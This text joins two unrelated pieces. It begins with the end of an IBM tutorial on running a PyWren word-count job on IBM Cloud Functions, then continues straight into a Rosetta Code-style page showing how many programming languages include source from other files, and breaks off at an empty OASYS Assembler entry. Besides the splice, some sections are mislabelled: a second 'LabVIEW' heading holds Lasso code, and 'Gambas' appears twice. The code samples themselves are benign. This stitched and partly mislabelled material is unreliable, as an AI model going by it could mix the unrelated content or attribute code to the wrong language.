namespace : <CLOUD_FUNCTIONS_NAMESPACE>
api_key : <CLOUD_FUNCTIONS_API_KEY>
Save the file.
The PyWren main action is responsible for executing Python functions inside PyWren’s runtime environment within Cloud Functions.
To deploy the runtime, navigate into the runtime folder and then run the deploy_runtime script:
runtime
deploy_runtime
```
cd ../runtime
./deploy_runtime
```
This script automatically creates a Python 3.6 action named pywren_3.6, which is based on the python:3.6 docker image. This action is used to run the Cloud Functions with PyWren.
pywren_3.6
python:3.6
Create a file named word_counter.py.
word_counter.py
Copy and paste the following code into the file:
import pywren_ibm_cloud as pywren
bucketname = 'words'
def my_map_function(bucket, key, data_stream):
print('I am processing the object {}/{}'.format(bucket, key))
counter = {}
data = data_stream.read()
for line in data.splitlines():
for word in line.decode('utf-8').split():
if word not in counter:
counter[word] = 1
else:
counter[word] += 1
return counter
def my_reduce_function(results):
final_result = {}
for count in results:
for word in count:
if word not in final_result:
final_result[word] = count[word]
else:
final_result[word] += count[word]
return final_result
chunk_size = 4*1024**2 # 4MB
pw = pywren.ibm_cf_executor()
pw.map_reduce(my_map_function, bucketname, my_reduce_function, chunk_size)
print(pw.get_result())
Update the bucketname variable (around line 3) to point to your own bucket containing the .txt documents, which you created earlier.
bucketname
Inspect the code. You can see a map function that counts each instance of a particular word, and a reduce function that compiles those results into one. PyWren runs each of the map functions as separate cloud functions. If you are processing a large data set, this approach can greatly improve running the computation in parallel. As you can see, the following code to kick off these parallel functions is straightforward:
pw = pywren.ibm_cf_executor()
pw.map_reduce(my_map_function, bucketname, my_reduce_function, chunk_size)
Run the python file that you just created:
python3 word_counter.py
You should see the following result with the word count for each instance of each word:
{'These': 3, 'are': 6, 'just': 3, 'some': 3, 'words': 3, 'there': 3, 'sixteen.': 2, 'eight.': 1}
You can check out the invocations in the Monitor page on the IBM Cloud Functions UI. As show in the following screen capture, you should see three new invocations, one for each of the .txt documents that are processed, and one for a combination of the results.
You can also check out the results in the pywrenresults bucket ythat you created in the Cloud Object Storage dashboard:
In this tutorial, you set up PyWren and used it to scale out functions to count the occurences of words in a set of text documents stored in a Cloud Object Storage instance. While this is a simple use case example, you can use it as a basis for your next project. We’re excited to see how you use PyWren to build on IBM Cloud Functions.
CloudData stores+
Get the Code »
Conference
June 24, 2019
API ManagementCloud+
Back to top | https://developer.ibm.com/tutorials/quickly-run-python-code-at-scale/ | CC-MAIN-2019-35 | refinedweb | 1,243 | 57.57 |
My Attribute Disappears
The GetCustomAttributes scenario (ICustomAttributeProvider.GetCustomAttributes
or
Attribute.GetCustomAttributes, referred to as GetCA in this post) involves
3 pieces:
- a custom attribute type
- an entity which is decorated with the custom attribute
- a code snippet calling GetCA on the decorated entity.
These pieces could be residing together in one assembly; or separately in 3 different
assemblies. The following C# code shows each piece in separate files, and I will
compile them into 3 assemblies: the attribute type assembly (attribute.dll), the
decorated entity assembly (decorated.dll) and the querying assembly (getca.exe):
// file: attribute.cs
public class MyAttribute
: System.Attribute { }
// file: decorated.cs
[My]
public class MyClass
{ }
// file: getca.cs
using System;
using System.Reflection;
class Demo {
static void Main(string[]
args) {
Assembly asm = Assembly.LoadFrom(args[0]);
object[] attrs = asm.GetType("MyClass").GetCustomAttributes(true);
Console.WriteLine(attrs.Length);
}
}
D:\> sn.exe -k sn.key
D:\> csc /t:library /keyfile:sn.key attribute.cs
D:\> csc /t:library /r:attribute.dll decorated.cs
D:\> gacutil -i attribute.dll
D:\> del attribute.dll
D:\> csc getca.cs
D:\> getca.exe decorated.dll
1
D:\> getca.exe \\machine\d$\decorated.dll
0
attribute.dll is installed in GAC (no local copy, to avoid confusion); getca.exe
checks whether the loaded type MyClass has MyAttribute. As you see from the output,
MyAttribute disappeared when the decorated entity was loaded from a share (or as
a partially trusted assembly, to be precise).
GetCA is supposed to return an array of attribute objects. In order to do so, it
parses the custom attribute metadata, finds the right custom attribute constructor,
and then invokes that .ctor with some parameters (if any). It is a late-bound call,
reflection decides whether the querying assembly should invoke the attribute .ctor,
or avoid calling it for security reasons.
Let me quote something from
ShawnFa's security blog: "by default, strongly named, fully trusted assemblies
are given an implicit LinkDemand for FullTrust on every public and protected method
of every publicly visible class". This means, in a scenario where a library is strongly
named and fully trusted, partial trusted assemblies are unable to call into such
library.
The GetCA scenario is not exactly the same, but similar. The .ctor to be invoked
is in attribute.dll (in GAC, strongly named and fully trusted). The querying assembly
(runs locally, fully trusted too) is the code that makes the invocation (if that
were to happen). But to make this .ctor invocation, we need pass in the parameters,
which are provided by the decorated entity assembly. GetCA will take the decorated
entity as the caller to the attribute type constructor. Based on what I
just quoted, if the decorated entity assembly is partially trusted, we will filter
out such attribute object creation, unless the attribute assembly is decorated with
AllowPartiallyTrustedCallersAttribute. Note please read
Shawn's blog entry carefully about this attribute and its' security
implications before taking this approach.
What if the attribute and decorated entity are in the same assembly? In this case,
it does not matter whether the assembly is loaded from a share or locally. GetCA
will try to create and return the attribute object. If the loaded assembly is partially
trusted, the runtime gives it a smaller set of permissions and running the .ctor
code is not going to do something terrible.
To close, GetCA will try to create the custom attribute object if any of the following
3 conditions is true:
- the decorated entity and the custom attribute type are in one assembly,
- the decorated entity is fully trusted,
- the assembly which defines the custom attribute type is decorated with APTCA.
By the way, the new class
CustomAttributeData in .NET 2.0 is designed to access custom attribute in
the reflection-only context, where no code will be executed (only metadata checking).
If we use CustomAttributeData.GetCustomAttributes instead in the above example,
it prints 1; one CustomAttributeData object, not one MyAttribute object. | https://docs.microsoft.com/en-us/archive/blogs/haibo_luo/my-attribute-disappears | CC-MAIN-2020-45 | refinedweb | 656 | 51.34 |
Readable url’s in Wicket - An introduction to wicketstuff-annotation.
Recently I read an article called “Wicket Creating RESTful URLs”. It’s a useful article but it still didn’t feel right. It should be easier and in the right place.
In Stripes for example you can just put @UrlBinding("/helloWorld.action") on your ActionBean and it works. That’s what I want!
After some searching I found wicketstuff-annotation. Wicketstuff provides a large set of additions to Wicket to make it even better. wicketstuff-annotation is a small part of it.
Start from scratch
To demonstrate wsa (Wicketstuff annotation) I will let Maven 2 generate a simple Wicket application from scratch. To generate this application visit
Execute this statement on the command line and you’ll have a working Wicket application within seconds.
Add a link to HomePage.html so you can see what url’s Wicket generates and how to improve them:
<wicket:link> <a href="HomePage2.html?page=133¶graph=25"> Link to wicket document HomePage2.html </a> </wicket:link>
Make a copy of HomePage.java and HomePage.html and call the files HomePage2.java and HomePage2.html. Change the href to HomePage2.html in the file HomePage2.html to HomePage.html. When you redeploy the application you will see the unreadable url I was talking about earlier: /wicketstuff-test/?wicket:bookmarkablePage=:com.xebia.HomePage2¶graph=25&page=133
I added the parameters page and paragraph to show that even these parameters can be made more readable.
Another bad thing is that we expose our package structure. End users don’t care in what package the page is and you shouldn’t give potential hackers any information.
The plain Wicket solution
The simplest solution is mounting a package to a path. We can map all of the package com.xebia to for example. Unfortunately we cannot map to the root (/) of the application. To mount a package add the following line to the constructor of WicketApplication:
mount("web",PackageName.forClass(HomePage.class));
The ugly url now looks much better:
Even the parameters page and paragraph are improved.
Suppose you don’t want to expose the name of your WebPage (HomePage2) and also hide the parameter names. This can be achieved by mounting a MixedParamurlCodingStrategy to the application:
public WicketApplication() {String[] parameterNames = new String[] { "page", "paragraph"};MixedParamUrlCodingStrategy mixedParamUrlCodingStrategy = new MixedParamUrlCodingStrategy("h2", HomePage2.class, parameterNames);mount(mixedParamUrlCodingStrategy);}
The problem with this solution is that you have to pass all parameters and put all class files in the Application file. The url structure and page parameters are related to the page, not the application, so they should be on the WebPage. But the result is a very nice url without having to add an extra dependency to wsa:
The Wicketstuff Annotation solution
To add wsa suppport to your application you have to add a dependency to your pom.xml:
<dependency><groupId>org.wicketstuff</groupId><artifactId>wicketstuff-annotation</artifactId><version>1.1</version></dependency>
The next step is clearing the old solution from the constructor of WicketApplication.
Add the folllowing line:
new AnnotatedMountScanner().scanPackage("com.xebia").mount(this);
This line will search the package com.xebia for annotations to mount url’s. In a production environment it is probably smarter to limit this to the package where all the WebPage classes are (ie. com.xebia.web).
Now we can finally add annotations to HomePage2 :
@MountPath(path = "h2")@MountMixedParam(parameterNames = { "page", "paragraph" })public class HomePage2 extends WebPage {...}
This works exactly the same as before, only in the right place.
There are several variations on the second annotation :
@MountPath (and no second annotation)
@MountPath and @MountMixedParam
@MountPath and @MountQueryString
There are several other encoding strategies you can use. On the wsa javadoc there isn’t much information. When you want to know more you should consult the Wicket javadocs and look for the package org.wicket.request.target.coding. The names used here are similar to the ones for wsa.
Conclusion
Wicketstuff annotation is a very nice addition to Wicket. It helps you to encode your url’s in the right place. The only small drawback is the dependency on Spring core, such a small library as wsa should work without Spring (not that Spring is a bad thing, I just don’t like many dependencies). So don’t be alarmed when you see a Spring jar pop up between your libraries.
Also be aware that the mount(path, packageName) solution is the safest when you don’t want to expose the package structure. When you forget to add annotations you end up with the ugly url’s and still exposing the package structure. I tried to add multiple mount points, but this wasn’t possible.
Sources
Hi Jeroen,
Nice write-up!
Annotations are a great way to put the URL definitions near the code that handles the URLs. I don't know if exposing your package structure is safer, it sounds more like security through obscurity... anyway, RESTful urls look much nicer!
Daan (writer of the Create RESTful URLs article)
I blog often and I truly appreciate your content. The article has truly peaked my interest. I will take a note of your blog and keep checking for new details about once a week. I opted in for your RSS feed as well. | http://blog.xebia.com/readable-url%E2%80%99s-in-wicket-an-introduction-to-wicketstuff-annotation/ | CC-MAIN-2017-13 | refinedweb | 881 | 50.33 |
Include a file
You are encouraged to solve this task according to the task description, using any language you may know.
- Task
Demonstrate the language's ability to include source code from other files.
Contents
- 1 360 Assembly
- 2 ACL2
- 3 Ada
- 4 ALGOL 68
- 5 AntLang
- 6 Applesoft BASIC
- 7 AutoHotkey
- 8 AWK
- 9 Axe
- 10 BaCon
- 11 BASIC
- 12 Batch File
- 13 BBC BASIC
- 14 Bracmat
- 15 ChucK
- 16 C / C++
- 17 C#
- 18 Clipper
- 19 Clojure
- 20 COBOL
- 21 Common Lisp
- 22 D
- 23 Déjà Vu
- 24 Delphi
- 25 DWScript
- 26 Emacs Lisp
- 27 Erlang
- 28 Euphoria
- 29 Factor
- 30 Forth
- 31 Fortran
- 32 FreeBASIC
- 33 Furryscript
- 34 FutureBasic
- 35 Gambas
- 36 Gambas
- 37 GAP
- 38 Gnuplot
- 39 Harbour
- 40 Haskell
- 41 HTML
- 42 Icon and Unicon
- 43 IWBASIC
- 44 J
- 45 Java
- 46 JavaScript
- 47 jq
- 48 Julia
- 49 Kotlin
- 50 LabVIEW
- 51 LabVIEW
- 52 Lasso
- 53 Lingo
- 54 Logtalk
- 55 Lua
- 56 m4
- 57 Maple
- 58 Mathematica / Wolfram Language
- 59 MATLAB / Octave
- 60 Maxima
- 61 Modula-2
- 62 Modula-3
- 63 Nemerle
- 64 NewLISP
- 65 Nim
- 66 OASYS Assembler
- 67 OCaml
- 68 Oforth
- 69 ooRexx
- 70 OpenEdge/Progress
- 71 Openscad
- 72 PARI/GP
- 73 Pascal
- 74 Perl
- 75 Perl 6
- 76 Phix
- 77 PHP
- 78 PicoLisp
- 79 PL/I
- 80 PowerBASIC
- 81 PowerShell
- 82 Prolog
- 83 PureBasic
- 84 Python
- 85 R
- 86 Racket
- 87 RapidQ
- 88 Retro
- 89 REXX
- 90 RPG
- 91 Ring
- 92 Ruby
- 93 Run BASIC
- 94 Rust
- 95 Scala
- 96 Seed7
- 97 Sidef
- 98 Smalltalk
- 99 SNOBOL4
- 100 SPL
- 101 Standard ML
- 102 Tcl
- 103 UNIX Shell
- 104 Ursa
- 105 Vala
- 106 VBScript
- 107 Verbexx
- 108 x86 Assembly
- 109 XPL0
- 110 zkl
- 111 ZX Spectrum Basic
360 Assembly[edit]
The COPY instruction includes source statements from the SYSLIB library.
COPY member
ACL2[edit]
For files containing only events (definitions and similar; no top-level function calls) which are admissible (note the lack of file extension):
(include-book "filename")
For all other files:
(ld "filename.lisp")
Ada[edit]
Some remarks are necessary here. Ada does not define how the source code is stored in files. The language rather talks about compilation units. A compilation unit "imports" another compilation unit by using context clauses - these have the syntax "with CU1, CU2, ...;". All compilers I know of require in their standard mode exactly one compilation unit per file; also file naming conventions vary. However GNAT e.g. has a mode that can deal with files holding several compilation units and any file name conventions.
with Ada.Text_IO, Another_Package; use Ada.Text_IO;
-- the with-clause tells the compiler to include the Text_IO package from the Ada standard
-- and Another_Package. Subprograms from these packages may be called as follows:
-- Ada.Text_IO.Put_Line("some text");
-- Another_Package.Do_Something("some text");
-- The use-clause allows the program author to write a subprogram call shortly as
-- Put_Line("some text");
ALGOL 68[edit]
The formal definition of Algol68 make numerous references to the standard prelude and postlude.
At the time the language was formally defined it was typical for code to be stored on decks of punched cards (or paper tape). Possibly because storing code on disk (or drum) was expensive. Similarly card decks can be read sequentially from just one card reader. It appears the Algol68 "standard" assumed all cards could be simply stacked before and after the actual source code, hence the references "prelude" and "postlude" in the formal standard.
ALGOL 68G[edit]
In the simplest case a file can be included as follows:
PR read "file.a68" PR
But in the Algol68 formal reports - it appears - the intention was to have a more structure approach.File: prelude/test.a68
# -*- coding: utf-8 -*- #File: postlude/test.a68
BEGIN
# Exception setup code: #
on value error(stand out, (REF FILE f)BOOL: GOTO value error not mended);
# Block setup code: #
printf(($"Prelude test:"l$))
# -*- coding: utf-8 -*- #File: test/include.a68
# Block teardown code: #
printf(($"Postlude test."l$))
EXIT
# Exception code: #
value error not mended: SKIP
END
#!/usr/bin/a68g --script #
# -*- coding: utf-8 -*- #
PR read "prelude/test.a68" PR;
printf($4x"Hello, world!"l$);
PR read "postlude/test.a68" PR
- Output:
Prelude test: Hello, world! Postlude test.
Other implementations: e.g. ALGOL 68RS and ALGOL 68G
Note that actual source code inclusion with parsing can be avoided because of a more generalised separate compilation method storing declaration specifications in a data dictionary. Different to #include found in C where the include file needs to be parsed for each source file that includes it.
ALGOL 68RS[edit]
This British implementation of the language has various ways to include it's own source code and and integrate with code compiled from other languages.
In order to support a top-down programming style ALGOL 68RS provided the here and context facilities.
A program could be written with parts to be filled in later marked by a here tag followed by a keeplist of declarations to be made available.
program (pass1, pass2) compiler begin string source := ...; tree parsetree; ... here pass1 (source, parsetree); ... instructions insts; here pass2 (parsetree, insts); ... end finish
The code to be executed in the context of the here tags would be written as:
program pass1 implementation context pass1 in compiler begin ... { code using "source" and "parsetree" } end finish
here is similar to the ALGOL 68C environ and context is equivalent to the ALGOL 68C using.
ALGOL 68C[edit]
Separate compilation in ALGOL 68C is done using the ENVIRON and USING clauses. The ENVIRON saves the complete environment at the point it appears. A separate module written starting with a USING clause is effectively inserted into the first module at the point the ENVIRON clause appears.
Example of
ENVIRON clause
A file called mylib.a68:
BEGIN
INT dim = 3; # a constant #
INT a number := 120; # a variable #
ENVIRON EXAMPLE1;
MODE MATRIX = [dim, dim]REAL; # a type definition #
MATRIX m1;
a number := ENVIRON EXAMPLE2;
print((a number))
END
Example of
USING clause
AntLang[edit]
AntLang is made for interactive programming, but a way to load files exists. Even if it is really primitive, i. e. file get's current environment and manipulates it.
load["script.ant"]
Applesoft BASIC[edit]
Chain PROGRAM TWO to PROGRAM ONE. First create and save PROGRAM TWO. Then, create PROGRAM ONE and run it. PROGRAM ONE runs and then "includes" PROGRAM TWO which is loaded and run using the Binary program CHAIN from the DOS 3.3 System Master. Variables from PROGRAM ONE are not cleared so they can be used in PROGRAM TWO. User defined functions should be redefined in PROGRAM TWO. See "Applesoft: CHAIN and user-defined functions Issues"
10 REMPROGRAM TWO
20 DEF FN A(X) = X * Y
30 PRINT FN A(2)
SAVE PROGRAM TWO
10 REMPROGRAM ONE
20 Y = 6
30 DEF FN A(X) = X * Y
40 PRINT FN A(2)
50 D$ = CHR$ (4)
60 PRINT D$"BLOADCHAIN,A520"
70 CALL 520"PROGRAM TWO"
SAVE PROGRAM ONE
RUN
- Output:
12 12
AutoHotkey[edit]
#Include FileOrDirName
#IncludeAgain FileOrDirName
AWK[edit]
The awk extraction and reporting language does not support the use of include files. However, it is possible to provide the name of more than one source file at the command line:
awk -f one.awk -f two.awk
The functions defined in different source files will be visible from other scripts called from the same command line:
# one.awk
BEGIN {
sayhello()
}
# two.awk
function sayhello() {
print "Hello world"
}
However, it is not permissible to pass the name of additional source files through a hashbang line, so the following will will not work:
#!/usr/bin/awk -f one.awk -f two.awk
GNU Awk has an
@include which can include another awk source file at that point in the code.
@include "filename.awk"
This is a parser-level construct and so must be a literal filename, not a variable or expression. If the filename is not absolute then it's sought in an
$AWKPATH list of directories. See the gawk manual for more.
Axe[edit]
This will cause the program called OTHER to be parsed as if it was contained in the source code instead of this line.
prgmOTHER
BaCon[edit]
other.bac
other = 42
including.bac
' Include a file
INCLUDE "other.bac"
PRINT other
- Output:
prompt$ bacon including.bac Converting 'including.bac'... done, 4 lines were processed in 0.005 seconds. Compiling 'including.bac'... cc -c including.bac.c cc -o including including.bac.o -lbacon -lm Done, program 'including' ready. prompt$ ./including 42
BASIC[edit]
The include directive must be in a comment and that the name of the file for inclusion is enclosed in single quotes (a.k.a. apostrophes).
Note that this will not work under QBasic.
REM $INCLUDE: 'file.bi'
'$INCLUDE: 'file.bi'
See also: BBC BASIC, Gambas, IWBASIC, PowerBASIC, PureBasic, Run BASIC, ZX Spectrum Basic
Batch File[edit]
call file2.bat
BBC BASIC[edit]
CALL filepath$
The file is loaded into memory at run-time, executed, and then discarded. It must be in 'tokenised' (internal) .BBC format.
Bracmat[edit]
get$"<i>module</i>"
ChucK[edit]
Machine.add(me.dir() + "/MyOwnClassesDefinitions.ck");
C / C++[edit].
C#[edit]
/* The C# language specification does not give a mechanism for 'including' one source file within another,
* likely because there is no need - all code compiled within one 'assembly' (individual IDE projects
* are usually compiled to separate assemblies) can 'see' all other code within that assembly.
*/
Clipper"
Clojure[edit]
Just as in Common Lisp:
(load "path/to/file")
This would rarely be used for loading code though, since Clojure supports modularisation (like most modern languages) through namespaces and code is typically located/loaded via related abstractions. It's probably more often used to load data or used for quick-and-dirty experiments in the REPL.
COBOL[edit]
In COBOL, code is included from other files by the
COPY statement. The files are called copybooks, normally end with the file extension '.cpy' and may contain any valid COBOL syntax. The
COPY statement takes an optional
REPLACING clause allows any text within the copybook to be replaced with something else.
COPY "copy.cpy". *> The full stop is mandatory, wherever the COPY is.
COPY "another-copy.cpy" REPLACING foo BY bar
SPACE BY ZERO
==text to replace== BY ==replacement text==.
Common Lisp[edit]
(load "path/to/file")
D[edit]
D has a module system, so usually there is no need of a textual inclusion of a text file:
import std.stdio;
To perform a textual inclusion:
mixin(import("code.txt"));
Déjà Vu[edit]
#with the module system:
!import!foo
#passing a file name (only works with compiled bytecode files):
!run-file "/path/file.vu"
Delphi[edit]
uses SysUtils; // Lets you use the contents of SysUtils.pas from the current unit
{$Include Common} // Inserts the contents of Common.pas into the current unit
{$I Common} // Same as the previous line, but in a shorter form
DWScript[edit]
In addition to straight inclusion, there is a filtered inclusion, in which the include file goes through a pre-processing filter.
{$INCLUDE Common} // Inserts the contents of Common.pas into the current unit
{$I Common} // Same as the previous line, but in a shorter form
{$INCLUDE_ONCE Common} // Inserts the contents of Common.pas into the current unit only if not included already
{$FILTER Common} // Inserts the contents of Common.pas into the current unit after filtering
{$F Common} // Same as the previous line, but in a shorter form
Emacs Lisp[edit]
Write this code in: file1.el
(defun sum (ls)
(apply '+ ls) )
In the directory of file1.el, we write this new code in: file2.el
(add-to-list 'load-path "./")
(load "./file1.el")
(insert (format "%d" (sum (number-sequence 1 100) )))
Output:
5050
Erlang[edit]
-include("my_header.hrl"). % Includes the file at my_header.erl
Euphoria[edit]
include my_header.e
Factor[edit]
USING: vocaba vocabb... ;
Forth[edit]
include matrix.fs
Other Forth systems have a smarter word, which protects against multiple inclusion. The name varies: USES, REQUIRE, NEEDS.
Fortran[edit]
include ''char-literal-constant''
"The interpretation of char-literal-constant is processor dependent. An example of a possible valid interpretation is that char-literal-constant is the name of a file that contains the source text to be included." See section 3.4 Including source text of the ISO standard working draft (Fortran 2003).
Included content may itself involve further inclusions but should not start with any attempt at the continuation of a statement preceding the include line nor should there be any attempt at the line following the include being a continuation of whatever had been included. It is not considered to be a statement (and so should not have a statement label) in Fortran itself but something a Fortran compiler might recognise, however a trailing comment on that line may be accepted. The exact form (if supported at all) depends on the system and its file naming conventions, especially with regard to spaces in a file name. The file name might be completely specified, or, relative as in
INCLUDE "../Fortran/Library/InOutCom.for" Further, Fortran allows text strings to be delimited by apostrophes as well as by quotes and there may be different behaviour for the two sorts, if recognised. For instance, the relative naming might be with reference to the initial file being compiled, or, with reference to the directory position of the file currently being compiled - it being the source of the current include line - as where file InOutCom.for contained an inclusion line specifying another file in the same library collection.
Different compilers behave differently, and standardisation attempts have not reached back to earlier compilers.
FreeBASIC[edit]
File to be included :
' person.bi file
Type Person
name As String
age As UInteger
Declare Operator Cast() As String
End Type
Operator Person.Cast() As String
Return "[" + This.name + ", " + Str(This.age) + "]"
End Operator
Main file :
' FB 1.05.0 Win 64
' main.bas file
#include "person.bi"
Dim person1 As Person
person1.name = "Methuselah"
person1.age = 969
Print person1
Print "Press any key to quit"
Sleep
- Output:
[Methuselah, 969]
Furryscript[edit]
Use a word with a slash at the end to import; how the file is found is based on the implementation (normally the "furinc" directory is looked at for include files).
The file is imported into a new namespace. Use the same name at the beginning and a slash, but now include something else afterward, and now means that name inside of that namespace.
FutureBasic[edit]
FB has powerful tools to include files in a project. Its "include resources" statement allows you to specify any number of files for copying into the built application package's Contents/Resources/ directory.
include resources "SomeImage.png"
include resources "SomeMovie.mpeg"
include resources "SomeSound.aiff"
include resources "SomeIcon.icns"
include resources "Info.plist" //Custom preference file to replace FB's generic app preferences
Including C or Objective-C headers (i.e. files with the .h extension) or source files (files with the .c or .m extension) requires a different 'include' syntax:
include "HeaderName.h" // do not use 'include resources' to include C/Objective-C headers include "CSourceFile.c" include "ObjectiveCImplementationFile.m"
Another special case are Objective-C .nib or .xib files. These are loaded with:
include resources "main.nib"
However, .nib files are copied to the built application's Contents/Resources/en.lproj/ directory.
Mac OS X frameworks may be specified with the 'include library' statement, which has two forms:
include library "Framework/Header.h" include library "Framework" // optional short form, expanded internally to: include library "Framework/Framework.h"
After including a Framework, you must notify the compiler of specific functions in the Framework that your code will be using with FB's "toolbox fn" statement as shown in this example:
include library "AddressBook/AddressBookUI.h" // tell FBtoC the functions toolbox fn ABPickerCreate() = ABPickerRef
Special treatment for C static libraries (*.a): The include statement copies the library file to the build_temp folder; you must also place the name of the library file in the preferences 'More compiler options' field [this causes it to be linked]. The example below is for a library MyLib that exports one symbol (MyLibFunction).
include "MyLib.a" BeginCDeclaration // let the compiler know about the function void MyLibFunction( void ); // in lieu of .h file EndC // let FBtoC know about the function toolbox MyLibFunction() MyLibFunction() // call the function
An include file can also contain executable source code. Example: Suppose we create a file "Assign.incl" which contains the following lines of text:
dim as long a, b, c a = 3 b = 7
Now suppose we write a program like this:
include "Assign.incl" c = a + b print c
When we compile this program, the result will be identical to this:
dim as long a, b, c a = 3 b = 7 c = a + b print c
Other include cases are detailed in FB's Help Center.
Gambas[edit]
In gambas, files are added to the project via the project explorer main window which is a component of the integrated development environment.
Gambas[edit]
Here a file is loaded into a variable
Public Sub Form_Open()
Dim sFile As String
sFile = File.Load("FileToLoad")
End
GAP[edit]
Read("file");
Gnuplot[edit]
load "filename.gnuplot"
This is the same as done for each file named on the command line. Special filename
"-" reads from standard input.
load "-" # read standard input
If the system has
popen then piped output from another program can be loaded,
load "< myprogram" # run myprogram, read its output
load "< echo print 123"
call is the same as
load but takes parameters which are then available to the sub-script as
$0 through
$9
call "filename.gnuplot" 123 456 "arg3"
Harbour"
Haskell[edit]
-- Due to Haskell's module system, textual includes are rarely needed. In
-- general, one will import a module, like so:
import SomeModule
-- For actual textual inclusion, alternate methods are available. The Glasgow
-- Haskell Compiler runs the C preprocessor on source code, so #include may be
-- used:
#include "SomeModule.hs"
HTML[edit]
Current HTML specifications do not provide an include tag, Currently, in order to include content from another file, it is necessary to include content via an iframe. However, this is not supported in some browsers and looks very untidy in other browsers:
<iframe src="foobar.html">
Sorry: Your browser cannot show the included content.</iframe>
There is an unofficial tag, but this will be ignored by most browsers:
<include>foobar.html</include>
Icon and Unicon[edit]Include another file of source code using the preprocessor statement:
$include "filename.icn"
IWBASIC[edit]
$INCLUDE "ishelllink.inc"
Further, external library or object files can be specified with the $USE statement, which is a compiler preprocessor command:
$USE "libraries\\mylib.lib"
IWBASIC also allows resources, files and data that are compiled with an application and embedded in the executable. However, resources in IWBASIC may be used only for projects, i.e., programs that have more than one source file.
Various resources are loaded as follows:
Success=LOADRESOURCE(ID,Type,Variable)
ID is either a numeric or string identifier to the resource,
TYPE is a numeric or string type and it stores the info in variable. The standard Windows resource types can be specified and loaded in raw form using the following constants:
@RESCURSOR
@RESBITMAP
@RESICON
@RESMENU
@RESDIALOG
@RESSTRING
@RESACCEL
@RESDATA
@RESMESSAGETABLE
@RESGROUPCURSOR
@RESGROUPICON
@RESVERSION
J[edit]
The usual approach for a file named 'myheader.ijs' would be:
require 'myheader.ijs'
However, this has "include once" semantics, and if the requirement is to include the file even if it has been included earlier you would instead use:
load 'myheader.ijs'
Java[edit]
To include source code from another file, you simply need to create an object of that other file, or 'extend' it using inheritance. The only requirement is that the other file also exists in the same directory, so that the classpath can lead to it. Since Java is quite particular about their "Class name is the same as file name" rule, if you want to use another file called Class2 in Class1, you don't need to be told a unique filename.
Just this would be enough.
public class Class1 extends Class2
{
//code here
}
You could also consider creating an instance of Class2 within Class1, and then using the instance methods.
public class Class1
{
Class2 c2=new Class2();
static void main(String[] args)
{
c2.func1();
c2.func2();
}
}
JavaScript[edit]
Pure JavaScript in browsers with the DOM[edit]
Following example, if loaded in an HTML file, loads the jQuery library from a remote site
var s = document.createElement('script');
s.type = 'application/javascript';
// path to the desired file
s.src = '';
document.body.appendChild(s);
Most be noted that it can also request HTTP source and eval() the source
With jQuery[edit]
$.getScript("");
With AMD (require.js)[edit]
require(["jquery"], function($) { /* ... */ });
CommonJS style with node.js (or browserify)[edit]
var $ = require('$');
ES6 Modules[edit]
import $ from "jquery";
jq[edit]
jq 1.5 has two directives for including library files, "include" and "import". A library file here means one that contains jq function definitions, comments, and/or directives.
The main difference between the two types of directive is that included files are in effect textually included at the point of inclusion, whereas imported files are imported into the namespace specified by the "import" directive. The "import" directive can also be used to import data.
Here we illustrate the "include" directive on the assumption that there are two files:
Include_a_file.jq
include "gort";
hello
gort.jq
def hello: "Klaatu barada nikto";
- Output:
$ jq -n -c -f Include_a_file.jq
Klaatu barada nikto.
Julia[edit]
Julia's
include function executes code from an arbitrary file:
include("foo.jl")
or alternatively
include_string executes code in a string as if it were a file (and can optionally accept a filename to use in error messages etcetera).
Julia also has a module system:
import MyModule
imports the content of the module
MyModule.jl (which should be of the form
module MyModule ... end, whose symbols can be accessed as
MyModule.variable, or alternatively
using MyModule
will import the module and all of its exported symbols
Kotlin[edit]
The closest thing Kotlin has to an #include directive is its import directive. This doesn't import source code as such but makes available names defined in another accessible package as if such names were defined in the current file i.e. the names do not need to be fully qualified except to resolve a name clash.
Either a single name or all accessible names in a particular scope (package, class, object etc.) can be imported.
For example:
fun f() = println("f called")
We can now import and invoke this from code in the default package as follows:
// version 1.1.2
import package1.f // import f from package `package1`
fun main(args: Array<String>) {
f() // invoke f without qualification
}
- Output:
f called
LabVIEW[edit]
In LabVIEW, any VI can be used as a "SubVI" by changing the icon and wiring the terminals to the front panel. This cannot be explained concisely in code; instead, see the documentation.
LabVIEW[edit]
web_response -> include('my_file.inc')
Lasso[edit]
include('myfile.lasso')
Lingo[edit]
-- load Lingo code from file
fp = xtra("fileIO").new()
fp.openFile(_movie.path&"someinclude.ls", 1)
code = fp.readFile()
fp.closeFile()
-- create new script member, assign loaded code
m = new(#script)
m.name = "someinclude"
m.scriptText = code
-- use it instantly in the current script (i.e. the script that contained the above include code)
script("someinclude").foo()
Logtalk[edit]
:- object(foo).
:- include(bar).
:- end_object.
Lua[edit]
To include a header file myheader.lua:
require "myheader"
m4[edit]
include(filename)
Maple[edit]
For textual inclusion, analogous to the C preprocessor, use the "$include" preprocessor directive. (The preprocessor is not a separate program, however.) This is frequently useful for large project development.
$include <somefile>
Or
$include "somefile"
It is also possible to read a file, using the "read" statement. This has rather different semantics.
read "somefile":
Mathematica / Wolfram Language[edit]
Get["myfile.m"]
MATLAB / Octave[edit]
MATLAB and Octave look for functions in *.m and *.mex included in the "path". New functions can be included, either by storing a new function in an existing path, or by extending the existing path to a new directory. When two functions have the same name, the function found first in the path takes precedence. The later is shown here:
% add a new directory at the end of the path
path(path,newdir);
addpath(newdir,'-end'); % same as before
% add a new directory at the beginning
addpath(newdir);
path(newdir,path); % same as before
Maxima[edit]
load("c:/.../source.mac")$
/* or if source.mac is in Maxima search path (see ??file_search_maxima), simply */
load(source)$
Modula-2[edit]
IMPORT InOut, NumConv, Strings;
Modula-3[edit]
IMPORT IO, Text AS Str;
FROM Str IMPORT T
Nemerle[edit]
To include classes, static methods etc. from other namespaces, include those namespaces with the using keyword
using System.Console;
using is for accessing code that has already been compiled into libraries. Nemerle also allows for creating partial classes (and structs), the source code of which may be split amongst several files as long as the class is marked as partial in each place that part of it is defined. An interesting feature of partial classes in Nemerle is that some parts of partial classes may be written in C# while others are written in Nemerle.
public partial class Foo : Bar // all parts of a partial class must have same access modifier;
{ // the class that a partial class inherits from only needs to
... // be specified in one location
}
NewLISP[edit]
;; local file
(load "file.lsp")
;; URLs (both http:// and file:// URLs are supported)
(load "")
Nim[edit]
After
import someModule an exported symbol
x can be accessed as
x and as
someModule.x.
import someModule
import strutils except parseInt
import strutils as su, sequtils as qu # su.x works
import lib.pure.strutils, lib/pure/os, "lib/pure/times" # still strutils.x
OASYS Assembler[edit]
